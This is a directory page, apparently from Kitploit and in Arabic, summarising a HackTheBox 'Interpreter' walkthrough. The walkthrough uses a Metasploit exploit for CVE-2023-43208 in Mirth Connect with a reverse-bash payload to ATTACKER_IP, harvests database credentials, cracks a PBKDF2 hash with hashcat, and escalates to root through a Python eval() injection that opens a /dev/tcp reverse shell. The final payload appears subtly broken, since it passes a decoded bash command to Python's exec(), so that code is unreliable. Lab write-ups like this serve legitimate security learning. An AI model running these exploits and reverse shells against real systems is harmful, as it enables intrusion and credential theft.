Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Interpreter-HackTheBox — HackTheBox Interpreter walkthrough: CVE-2023-43208 Mirth Connect deserialization RCE، كسر تجزئة PBKDF2، وeval() injection privilege escalation إلى root. | Kitploit
أدوات/GitHubGitHub/ledksv/interpreter-hackthebox
كسر كلمات المرورتصعيد الامتيازاتالاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالCTFاختبار الاختراقالتعلم والتعليم
GitHubledksv/interpreter-hackthebox

Interpreter-HackTheBox

منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

HackTheBox Interpreter walkthrough: CVE-2023-43208 Mirth Connect deserialization RCE، كسر تجزئة PBKDF2، وeval() injection privilege escalation إلى root.

عرض المستودع

Interpreter — HackTheBox

المنصة: HackTheBox نظام التشغيل: Linux الحالة: متقاعد — تم نشر الشرح الكامل.

الشرح الكامل: l3dsec.com/walkthroughs/interpreter-htb


سلسلة الهجوم

root@kitploit:~
Nmap → Mirth Connect 4.4.0 (80/443)
  → CVE-2023-43208 unauthenticated Java deserialization RCE
    → Shell as mirth
      → mirth.properties → MySQL credentials
        → MySQL → sedric PBKDF2 hash → hashcat → SSH → USER FLAG
          → notif.py running as root on 127.0.0.1:54321
            → eval() injection via XML POST → ROOT SHELL → ROOT FLAG

1. الاستطلاع

root@kitploit:~
nmap -sV -sC <TARGET_IP> -Pn
root@kitploit:~
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 9.2p1 (Debian)
80/tcp  open  http    Jetty (Mirth Connect)
443/tcp open  ssl     Jetty SSL (Mirth Connect)

بصمة الإصدار عبر واجهة Mirth REST API:

root@kitploit:~
curl -sk https://<TARGET_IP>/api/server/version -H "X-Requested-With: XMLHttpRequest"
# Returns: 4.4.0

2. موطئ القدم الأولي — CVE-2023-43208

Mirth Connect 4.4.0 عرضة لـ RCE غير مصادق عليه عبر Java deserialization:

root@kitploit:~
use exploit/multi/http/mirth_connect_cve_2023_43208
set RHOSTS <TARGET_IP>
set RPORT 443
set LHOST <ATTACKER_IP>
set FETCH_WRITABLE_DIR /tmp
set payload cmd/unix/reverse_bash
exploit

Shell باسم mirth.


3. جمع بيانات الاعتماد

root@kitploit:~
find / -name "mirth.properties" 2>/dev/null
# /usr/local/mirthconnect/conf/mirth.properties
# database.username = mirthdb
# database.password = <redacted>
# database.url = jdbc:mariadb://localhost:3306/mc_bdd_prod

mysql -u mirthdb -p'<db_password>' mc_bdd_prod

يكشف استطلاع MySQL عن المستخدم sedric مع تجزئة PBKDF2، وقناة HL7 تعيد توجيه XML إلى http://127.0.0.1:54321/addPatient.


4. علم المستخدم — كسر التجزئة

root@kitploit:~
hashcat -m 10900 hash.txt /usr/share/wordlists/rockyou.txt

تم كسر التجزئة. اتصل عبر SSH باسم sedric، واقرأ /home/sedric/user.txt.


5. تصعيد الصلاحيات — حقن eval()

يعمل notif.py بصلاحيات root ويستمع على 127.0.0.1:54321/addPatient — نفس النقطة النهائية التي تعيد Mirth توجيه XML إليها. يمرر حقل XML firstname مباشرة إلى دالة eval() في Python.

الحمولة من shell الخاص بـ mirth:

root@kitploit:~
import urllib.request, base64
from urllib.request import Request

cmd = "bash -i >& /dev/tcp/<ATTACKER_IP>/9004 0>&1"
b64 = base64.b64encode(cmd.encode()).decode()
inj = f"{{exec(__import__('base64').b64decode('{b64}').decode())}}"
xml = f"<patient><firstname>{inj}</firstname><lastname>x</lastname></patient>"

req = Request(
    "http://127.0.0.1:54321/addPatient",
    data=xml.encode(),
    headers={"Content-Type": "application/xml"}
)
urllib.request.urlopen(req)

تم استقبال root shell على المستمع.


الأعلام

العلمالقيمة
Userredacted
Rootredacted

لأغراض تعليمية فقط. اختبر فقط الأنظمة التي تملكها أو لديك إذن كتابي صريح باختبارها.

تنزيل الأداة